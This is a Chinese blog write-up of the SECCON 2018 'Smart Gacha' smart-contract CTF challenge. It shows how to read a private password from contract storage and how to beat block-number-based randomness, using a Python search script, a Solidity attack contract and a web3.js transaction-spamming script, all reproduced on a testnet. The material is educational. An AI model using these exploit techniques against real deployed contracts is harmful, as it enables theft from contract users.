记SECCON 2018的一道智能合约题目

最新推荐文章于 2024-08-21 21:00:39 发布
最新推荐文章于 2024-08-21 21:00:39 发布
阅读量867 收藏
点赞数

前言

周末抽时间整理了一下seccon的区块链的题目,当时没空打,现在想想还是挺遗憾的,其实这几道题考点并没有多少新颖的地方,不过做题的手法还是有点意思,所以在这里记录一下

Smart Gacha

这道题有两关,lv1还算简单,很多队伍都做出来了

lv1

题目描述如下

Toggle the "getItem" boolean value in "fair lottery contract" to true.
If you are lucky, you have only to press "test luck" button once.
Even if you are not lucky, all you have to do is press the button 1,000,000 times.

给出源码如下

pragma solidity^0.4.24;
contract Gacha {
    address public owner;
    address public player;
    uint256 public played = 0;
    uint256 public seed;
    uint256 public lastHash;
    bool public getItem = false;
    bytes32 private password;

    modifier onlyOwner() {
        require(owner == msg.sender);
        _;
    }

    constructor(bytes32 _password, uint256 _seed, address _player) public {
        owner = msg.sender;
        player = _player;
        password = _password;
        lastHash = uint256(blockhash(block.number-1));
        seed = _seed;
    }

    function pickUp() public returns(bool) {
        require(player == msg.sender);

        uint256 blockValue = uint256(blockhash(block.number-1));
        if (lastHash == blockValue) {
            revert();
        }
        lastHash = blockValue;

        played++;
        if (mod(played, 1000000) == 0) {
            getItem = true;    
            return getItem;
        }

        uint256 result = mod(seed * block.number, 200000);
        seed = result;

        if (result == 12345) getItem = true; // Flag is here!!

        return getItem;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b != 0);
        return a % b;
    }

    function initSeed(uint256 _seed) onlyOwner public {
        seed = _seed;
    }

    function changeOwner(bytes32 _password) public {
        if (password == _password) owner = msg.sender;
    }}

代码并不长,逻辑也很简单,在合约部署时需要指定player,同时题目会设置密码以及初始化种子,然后合约会保存前一个块的hash。然后我们往下看,pickUp函数就是我们用来投注的函数,找到其中随机数生成的部分

uint256 result = mod(seed * block.number, 200000);

很有意思,它是直接拿区块号和seed相乘再用200000取模得到随机数,然后使用它更新seed,而我们的目标是让结果等于12345,这样才能得到flag,另外前面还有一个play次数的判断,如果我们调用pickUp达到1000000次,那么也可以解锁,不过显然这并不现实。

在函数的第一部分还使用lashhash锁定了区块,这样在每个区块里你只能调用该函数一次,进一步封锁了捷径,这样看起来我们要满足条件还是比较困难的,然而在合约的最后我们注意到seed是可以修改的,条件是合约的owner,而修改合约的owner需要知道密码,而密码是在初始化题目部署合约时由题目设定的,在前面的变量的定义里它是个private变量,仅能被合约内部调用,我们是不能直接看到的。

不过我相信熟悉EVM的人应该都知道合约里的状态变量我们都是可以通过getStorageAt读到的,所以这里的密码我们是可以直接获取的,然后我们就可以取得合约的owner,之后就可以修改seed,根据后面的区块号选定一个特定值,之后只要在满足的区块里调用pickUp函数即可,利用思路还是比较清晰的,所以lv1还算比较简单,比赛的时候也有很多队伍做出来了

读取密码很简单,从0开始数下来password所使用的存储位是6,所以直接读取6号存储位即可,因为题目环境已经关闭而且题目是搭在私链上的,所以这里我就直接在ropsten测试链上进行复现,在部署合约时设置的密码为0x253545,这样即可在存储中读到

之后的操作就非常简单了,这里不多说了,我们来看看lv2,这部分在比赛的时候没几支队伍做出来

lv2

题目描述如下

We don't want to think that you cheated, but we enhance security of the contract.
OK, press "test luck" button to check your luck!

至于代码上其实几乎跟lv1一样,不过在最关键的地方也就是其中的password它修改成了hash值

function checkPassword(bytes _password) public view returns(bool) {
        if (password == keccak256(abi.encodePacked(_password))) {
            return true;
        }
        else return false;
    }

这样我们再想向之前那样change owner修改seed就不可行了,所以利用点肯定与lv1不一样

我们再次回到合约中随机数的生成上,显然这里的随机数是我们可以提前获取到的,因为只使用了区块号作为随机数生成源,所以对于每个区块我们可以判断是否要调用pickUp函数,同时每次调用都会对seed进行更新,这样的话就豁然开朗了,我们可以计算出一个区块号的序列,遵循该序列进行调用我们可以不断更新seed,最终在最后一次调用中满足判断条件

首先我们要算出该序列,这里我参考了此处的writeup

def step(state, number):
    return (state * number) % 20000000def findsequence(seed, start):
    # breadth first search
    # stop when result == 12345

    # initialize
    queue = {seed: []}
    blockn = start + ((start % 2) + 1) # we only want odd ones
    done = False
    # start exploring
    while not done:
        print blockn - start, len(queue)
        nextqueue = queue.copy()
        for state in queue:
            # check new block for every saved state
            newstate = step(state, blockn)
            #print newstate
            if newstate % 2 == 0:
                # skip
                continue
            if newstate == 12345:
                print 'found'
                print 'blists', queue[state] + [blockn]
                res = queue[state] + [blockn]
                done = True
                break
            if len(nextqueue[state]) > 2:
                # skip
                # we want a short sequence, to reduce timing errors
                continue
            nextqueue[newstate] = nextqueue[state] + [blockn]
        queue = nextqueue
        blockn += 2

    return resblists=findsequence(2345,4370335)seedlists=[2345]for x in range(5):
    seedlists.append(blists[x]*seedlists[x]%20000000)print 'seedlists',seedlists

原理就是暴力穷举,首先区块肯定得是奇数,seed也是奇数,否则就无法使得计算结果为12345,那么就从设定的开始区块开始不断尝试后面的奇数块,将得到的序列存储,这里存储使用了dict,在key中存储序列得到的seed值,value里存储该序列,不断尝试直到找到满足条件的序列,为了使得需要的区块尽可能少所以还添加了对长度的限制,这里的限制实际上等价于满足的序列长度需小于等于4,当然也可以更小,但是这样相邻块的间隔过大,也不利于我们进行攻击

这里我是在测试链上进行复现,所以对题目进行了一定的修改,将模数修改为了20000000,初始化的seed我随便设了2345,开始的区块号就得由你看着选了,按照我的流程首先得到区块列表和对应的seed更新列表

blists [4370433, 4370449, 4370481, 4370513]
seedlists [2345, 8665385, 3207865, 13033065, 12345]

下一步我们准备部署一个攻击合约,这也很简单,其实就是判断下区块号决定要不要调用目标合约的pickUp函数

contract attack {
    Gacha target=Gacha(your challenge address);
    uint [] blists=[4370433, 4370449, 4370481, 4370513];
    uint [] seedlists=[2345, 8665385, 3207865, 13033065, 12345];

    function pwn(uint n) {
        if(block.number == blists[n]){
            if (target.seed() == seedlists[n]){
                target.pickUp();
            }
            else {
                revert();
            }
        }
        else {
            revert();
        }
    }}

这里还需要注意的是challenge合约部署时即需要指定player,而且判断时使用的是msg.sender,所以要填入的player必须是攻击合约地址,这就代表着攻击合约的地址要么提前算出来要么提前部署,因为直接算合约地址也挺方便的所以我是选择了提前算攻击合约的地址,当然你也可以将攻击合约换一个写法让它接受传入的challenge合约参数

下面是以太坊源码中计算合约地址的代码,基于此我们可以直接计算地址在对应nonce下创建的合约的地址

func CreateAddress(b common.Address, nonce uint64) common.Address {

    data, _ := rlp.EncodeToBytes([]interface{}{b, nonce}) //对地址和nonce进行rlp编码

    return common.BytesToAddress(Keccak256(data)[12:]) //利用keccak256算hash,后20个字节作为新地址}

模拟的代码如下

const util = require('ethereumjs-util');
const rlp = require('rlp');
encodedRlp = rlp.encode([address, nonce]);
buf = util.sha3(encodedRlp);contractAddress =buf.slice(12).toString('hex');

填入address和nonce即可计算得到合约地址,这部分就不多说了

这样成功部署了攻击合约之后我们就需要调用它了,有的人可能会选择手工调用,比如在remix里一次又一次地调用攻击合约的pwn函数,这样不仅自己点的累而且发出的交易有限,成功率也不高,何况我们还得实时监控当前的区块变化,所以合适的选择是自动化运作,在这我选择了web3.js来与合约进行交互,说实话因为js代码写的并不多所以可能看起来不是很优雅,还请大佬轻喷

代码如下

var Web3 = require("web3");var web3 = new Web3();web3.setProvider(new Web3.providers.HttpProvider("https://ropsten.infura.io"));web3.eth.accounts.wallet.add(your private key);web3.eth.defaultAccount=web3.eth.accounts.wallet[0].address;var blists=[4370433, 4370449, 4370481, 4370513];var seedlists=[2345, 8665385, 3207865, 13033065, 12345];var abi=[{"constant":false,"inputs":[{"name":"n","type":"uint256"}],"name":"pwn","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]var address='bbe561c39f42fa39bcbfb60bcd8cd7fe6e7a631d';var attack=new web3.eth.Contract(abi,address);function sleep (time) {
  return new Promise((resolve) => setTimeout(resolve, time));}var blocks=0;var gg=0;var nonces=your start nonce;(async function() {
    for(var i=0;i<5000;i++){
  await sleep(1000).then(async ()=>{
    await web3.eth.getBlockNumber().then(function(value){
    blocks=value;
  });
    if (blocks<blists[gg]){
        console.log(blocks,gg,nonces);
        attack.methods.pwn(gg).send({from:'0x1Eed0499dF1539767aF3a4981c8c598572bAC20a',nonce:nonces,gas:3000000,gasPrice:50000000000}).catch(new Function());
        nonces+=1;

    }
    else {
        gg+=1;
    }});}})();

代码中使用的abi可以使用solc编译得到

solc seccon_gaca.sol --abi

为了让发送交易的频率不要太快这里我设置的频率是一秒一次,另外有一点需要特别注意就是nonce的更新,如果不自己设定nonce的话那么在你的上一个交易未确认的时候web3默认发送时取的nonce还是上一个,这样发送的交易跟前面是一样的,会直接被节点丢弃,也就没有了意义,所以每次发送就更新一次nonce

另外就是每次发送都需要判断一下当前的区块号,跟blists进行比对以决定当前要准备塞入交易的是哪个块,程序跑起来之后我们就可以在区块浏览器里看到合约地址下疯狂滚动的交易。

可以看到交易非常密集,这也是为了确保每个块里都能塞到我们的交易,尽管如此有些区块还是会落空,这也得看点运气,说实话前段时间测试链经历了几次更新后感觉出块时间更不稳定了。我们可以在挑战合约处查看seed的更新来查看我们的成功进度,如果目标块没有成功包含那么就只能重新部署再来一次了,不行的话可以适当将发送交易的频率再调高一点。

写在最后

其实写到后面跟seccon比赛时的题目区别已经挺大了,毕竟我是在测试链上进行复现的,而比赛则是在官方提供的私链上进行,所以在环境的搭建与处理上有很大区别,在这里主要还是记录一下方法吧,这样在测试链上进行复现感觉也有点影响别人

参考

write up by Tower of Hanoi

FLy_鹏程万里
关注
专栏目录
solidity智能合约面试
AI炼丹师的专栏
06-21 3714
问:以太坊的有价通证叫什么? 答:以太(ETH:Ether)问:Wei和以太有什么区别? 答:Wei是一个面额,像美分到美元或便士到磅。 1 ETH =10^18 Wei问:以太坊的平均出块时间是多少? 答:大约14秒问:以太坊的平均块大小是多少? 答:大约2KB,实际值取决于具体情况。问:以太坊是否支持脚本? 如果是这样,支持什么类型的脚本? 答:是的。 它支持智能合约问:你如何得到以太? 答:有几种方法: 1.成为一名矿工 2.用其他货币换取 3.使用以太Faucet,例如 https://faucet
Seccon CTF 2016 部分Writeup.md
Bendawang's Blog
12-15 2561
Seccon CTF 2016 部分Writeup
智能合约练习
曹俊的博客
09-16 365
// SPDX-License-Identifier: GPL-3.0 pragma solidity >=0.7.0 <0.9.0; contract CollectionName { uint public totalNum; //收集的信息总数 uint contractCreationTime; //创建合约时间 构造函数初始化时获取时间 address public owner; //存储合约owner uint privat...
实现CTF智能合约题目的环境部署
weixin_30337157的博客
04-30 547
本文章是参考一位大佬博客学来的。 智能合约的环境主要包括两部分:一个是智能合约的部署,另一个就是监听合约事件进而发送flag的脚本。 智能合约部署 这里写的合约是指solidity合约,使用Remix IDE。 合约主要部署到以太坊测试链而非主链上(没钱
【Solidity】合约交互基础
最新发布
Superman_H的博客
08-21 830
# 数据的编码与解码 1. `abi.encode`:将给定的参数按照 ABI(应用二进制接口)规则编码成字节数组。编码后的数据总是 32 字节的倍数,不足 32 字节的部分会自动填充。适用于合约调用和数据传输。 2. `abi.encodePacked`:与 `abi.encode` 类似。不同的是,它生成的字节数组是压缩过的,不会自动填充到 32 字节的倍数。适用于生成紧凑数据和哈希计算。 3. `abi.decode`:将 `abi.encode` 返回的字节数组解码成原始数据。需要提供数据的类型信
以太坊智能合约重放攻击细节剖析
weixin_34344677的博客
08-31 318
1 攻击背景 在资产管理体系中,常有委托管理的情况,委托人将资产给受托人管理,委托人支付一定的费用给受托人。这个业务场景在智能合约中也比较普遍。 合约设计 functiontransferProxy(address_from,address_to,uint256_value,uint256_fee,uint8_v,bytes32_r,bytes32_s) transf...
pwn-seccon18-profile
sunrise的博客
10-30 252
栈溢出&amp;暴力泄露栈地址 这个方法我做了一天,真是差劲 程序分析: 这是用c++编写的程序,用ida打开很奇怪,一大串c++的特征,有点难看。但是功能很简单: 登陆:输入姓名,年龄和简介信息 update:修改简介信息 show:显示姓名  年龄 和 简介信息 exit:退出程序 程序开启了canary,no PIE 程序对个人信息用一个结构体来维护,这个结构体保存在栈上:...
Seccon-CTF-2016-cheer_msg
02-24
样本来自2016年的Seccon ctf的一道pwn,该题目使用了alloca内存分配函数,该函数不同于一般堆上的内存分配,而是在栈上进行。解:https://blog.csdn.net/A951860555/article/details/114011564
Seccon CTF 2016 biscuiti writeup
Bendawang's Blog
12-15 3439
web300 biscuiti 解 (web + crypto)
Seccon-ctf-2016-pwn-cheer_msg
lifanxin的博客
02-24 527
Write Up文件信息漏洞定位利用分析wp总结 文件信息 样本来自2016年Seccon ctf的一道pwn–cheer_msg,同时这道题目也给了libc文件,减少了漏洞利用难度。 检查样本信息:   32位小端程序,开启了栈溢出保护和NX保护。 漏洞定位 整个程序还是比较易懂的,主体逻辑存在于main和message两个函数。上图展示了main函数的伪C代码,要求输入一个长度,然后按照长度进行相应计算后使用alloca在栈上分配空间。这到题目比价新颖的是使用了alloca函数,该函数不同于一般的
whaleCTF-30days-隐写【第二期】-SECCON大战-writeup
CTF小白的爬坑之路
07-23 2229
题目: 这次的大电影演员整容十分强大哦!可以我们还有一位隐藏嘉宾,不知道你能不能找到。 打开压缩包,获取视频后打开观看,发现是一个SEECON做的类似星球大战的开头片。 观看一段时间不难发现在黑色背景中隐藏的二维码,可是这个二维码只有在黄色字体扫过的时候才能够看到。这道的解法是将这些图像(每一帧)重合恢复二维码。 按照帧来分解视频,我们使用ffmpeg工具,ffmpeg可以运行音...
深入以太坊智能合约 ABI
01-08
开发 DApp 时要调用在区块链上的以太坊智能合约,就需要智能合约的 ABI。本文希望更多了解 ABI,如为什么需要 ABI?如何解读 Ethereum 的智能合约 ABI?以及如何取得合约的 ABI? 数字猫合约 ABI ABI(Application Binary Interface) 如果理解 API 就很容易了解 ABI。简单来说,API 是程序与程序间互动的接口。这个接口包含程序提供外界存取所需的 functions、variables 等。ABI 也是程序间互动的接口,但程序是被编译后的 binary code。所以同样的接口,但传递的是 binary 格式的信息。所以 ABI
solidityABI编码函数
hkduan的博客
05-18 1093
solidityABI编码函数 abi.encode(…) returns (bytes):计算参数的 ABI 编码。自动补全32位字节 abi.encodePacked(…) returns (bytes):计算参数的紧密打包编码 abi. encodeWithSelector(bytes4 selector, …) returns (bytes): 计算函数选择器和参数的 ABI 编码 abi.encodeWithSignature(string signature, …) returns (byte
智能合约学习笔--随机数攻击复现
m0_57291352的博客
10-13 2990
本篇复现了使用区块变量生成随机数的幸运随机数游戏合约中存在的随机数漏洞以及攻击方法,包含代码及部署 在智能合约中随机数经常被用到,但是我们知道,这些生成的随机数都是伪随机数,当生成的随机数不是足够安全的时候就会产生漏洞。随机数攻击,就是针对智能合约的随机数生成算法进行攻击,预测智能合约的随机数。
Solidity-获取区块属性信息
皓阳当空-博客
08-19 5898
一:区块属性 blockhash(uint blockNumber) 在0.4.22版本,将block.blockhash(uint blockNumber) returns (bytes32)替换 block.coinbase (address): 当前块所属旷工地址 block.difficulty (uint): 当前块难度 block.gaslimit (uint): 当前块汽油上...
solidity学习过程 --- abi编码
qq_35434814的博客
03-05 9821
abi编码函数 什么是abi 应用程序二进制接口,以太坊的调用合约时的接口说明 ABI是两个程序模块之间的接口,主要是用于将数据编码或解码为源代码所表示的代码。 以太坊中主要用于solidity合约的函数调用,以及反向编码读取数据的中的方法 solidityABI编码函数 abi.encode(…) returns (bytes):计算参数的 ABI 编码。 abi.encodePacked...
Solidity进阶:哈希运算
qq_28052455的博客
07-31 178
对比上面两次结果发现虽然参数不一样但encodePacked编码后的结果一样,这样就会产生不一样的参数生成一样的哈希值,而encode不会存在这种情况,所以在hash运算时推荐使用abi.encode。哈希函数(hash function)是一个密码学概念,它可以将任意长度的消息转换为一个固定长度的值,这个值也称作哈希(hash)。在solidity中的哈希值为byte32定长字节类型,使用内部函数Keccak256加密。哈希的应用:获取唯一数据标识,签名运算。
pickup 类的使用
kasteluo的专栏
12-19 1861
如何实现所有物体可以轻松被虚拟的人物拾取并进行交互呢。 在VR项目模版中,已经实现了一个简单的拾取功能:BP_PickupCube蓝图类,该类通过实现PickUpActor 接口类的Pick/Drop方法。但如何去拾取其他物体呢。。。     可以通过三种方法完成:   1. 复制原来的BP_PickupCube蓝图类,双击模型,将蓝图的staticMeshComponents
UE4c++实现BatteryPickUp总结
Capr1corn的博客
12-10 616
1 定义了一个pickup基类。在这个基类中,有七个方法, 其中BeginPlay() 和Tick()是继承与AActor中的。 Tick有个默认float类型的参数。—tick表示的每多少秒运行一次吗?然后,传入的参数表示运行的时间间隔。 PickUp有两个成员变量, 一个指向staticMesh的指针,用来指定pickup所用户的静态物体组件。、 一个是bool类型,用来表示pickup的激...
curl $(python -c 'print("http://skipinx.seccon.games:8080/?proxy=x"+"&a="*999)')
05-11
这个地址是http://skipinx.seccon.games:8080/,它似乎是一个代理服务,可以通过参数proxy指定代理地址。但是这个请求中的参数a是什么意思,需要进一步了解请求的目的和服务的功能才能确定。同时,这个请求中的参数a...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值